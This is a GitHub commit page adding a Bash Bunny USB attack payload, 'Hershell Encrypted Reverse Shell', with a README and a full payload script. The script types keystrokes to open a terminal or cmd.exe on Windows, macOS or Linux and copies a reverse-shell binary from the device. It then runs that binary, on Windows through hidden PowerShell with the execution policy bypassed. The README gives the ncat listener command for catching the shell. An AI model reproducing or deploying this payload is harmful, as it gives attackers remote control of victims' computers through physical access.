-
Notifications
You must be signed in to change notification settings - Fork 1.5k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add Hershell Encrypted Reverse shell payload (#335)
- Loading branch information
Showing
2 changed files
with
132 additions
and
0 deletions.
There are no files selected for viewing
14 changes: 14 additions & 0 deletions
14
payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,14 @@ | ||
| # Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode) | ||
|
|
||
| Author: m3t4lk3y<br> | ||
| Creds: Ronan Kervella (Creator of Hershell)<br> | ||
| Version: Version 0.5<br> | ||
|
|
||
| ## Instructions | ||
|
|
||
| Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting) | ||
|
|
||
| 1. Compile all payloads and place binaries in the `payloads\$SWITCH_POSITION` directory (Double check binary names. Defaults are `mac32`, `linux32`, `win32.exe`) | ||
| 2. Uncomment desired target OS payload lines and ensure others are commented out | ||
| 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. `ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343`) | ||
| 4. Execute attack via Bash Bunny |
118 changes: 118 additions & 0 deletions
118
payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,118 @@ | ||
| #!/bin/bash | ||
| # Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode) | ||
| # Author: m3t4lk3y | ||
| # Version: 0.5 | ||
| # Target: Windows, Mac OSX, Linux | ||
| # Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell | ||
|
|
||
| # Instructions: | ||
| # Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting) | ||
| # 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe) | ||
| # 2. Uncomment desired target OS payload lines and ensure others are commented out | ||
| # 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343) | ||
| # 4. Execute attack via Bash Bunny | ||
|
|
||
| # SETUP | ||
| DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny | ||
| LED R | ||
| GET SWITCH_POSITION # Gets switch position (e.g. switch2) | ||
| ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial | ||
|
|
||
| # Modified RUN helper | ||
| function RUN() { | ||
| local os=$1 | ||
| shift | ||
| [[ -z "$os" || -z "$*" ]] && exit 1 | ||
| case "$os" in | ||
| WIN) | ||
| QUACK GUI m | ||
| QUACK DELAY 500 | ||
| QUACK GUI r | ||
| QUACK DELAY 500 | ||
| QUACK STRING cmd.exe | ||
| QUACK DELAY 100 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING "$@" | ||
| QUACK DELAY 100 | ||
| QUACK ENTER | ||
| ;; | ||
| OSX) | ||
| QUACK GUI SPACE | ||
| QUACK DELAY 100 | ||
| QUACK STRING terminal | ||
| QUACK DELAY 100 | ||
| QUACK ENTER | ||
| QUACK GUI t | ||
| QUACK DELAY 100 | ||
| QUACK STRING /bin/bash | ||
| QUACK DELAY 100 | ||
| QUACK ENTER | ||
| QUACK STRING "$@" | ||
| QUACK DELAY 100 | ||
| QUACK ENTER | ||
| QUACK DELAY 100 | ||
| QUACK STRING "exit" | ||
| QUACK DELAY 100 | ||
| QUACK ENTER | ||
| QUACK DELAY 100 | ||
| QUACK STRING "exit" | ||
| QUACK DELAY 100 | ||
| QUACK ENTER | ||
| ;; | ||
| UNITY) | ||
| QUACK ALT F2 | ||
| QUACK DELAY 1000 | ||
| QUACK STRING xterm | ||
| QUACK DELAY 1000 | ||
| QUACK ENTER | ||
| QUACK DELAY 1000 | ||
| QUACK STRING /bin/bash | ||
| QUACK DELAY 1000 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING cd /media/'$USER' | ||
| QUACK DELAY 500 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING "$@" | ||
| QUACK DELAY 500 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING "exit" | ||
| QUACK DELAY 500 | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING "exit" | ||
| QUACK DELAY 500 | ||
| QUACK ENTER | ||
| ;; | ||
| *) | ||
| exit 1 | ||
| ;; | ||
| esac | ||
| } | ||
| export -f RUN | ||
|
|
||
| # START Attack | ||
| LED Y | ||
|
|
||
| # [+] Mac - Uncomment the following lines to use: | ||
| # until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount | ||
| # LED Y FAST | ||
| # RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &" | ||
|
|
||
| # [+] Linux - Uncomment the following lines to use: | ||
| until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount | ||
| LED Y FAST | ||
| RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &" | ||
|
|
||
| # [+] Windows - Uncomment the following lines to use: | ||
| # until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount | ||
| # LED Y FAST | ||
| # RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')" | ||
|
|
||
| # END | ||
| sleep 5 | ||
| LED G | ||
| # shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired) |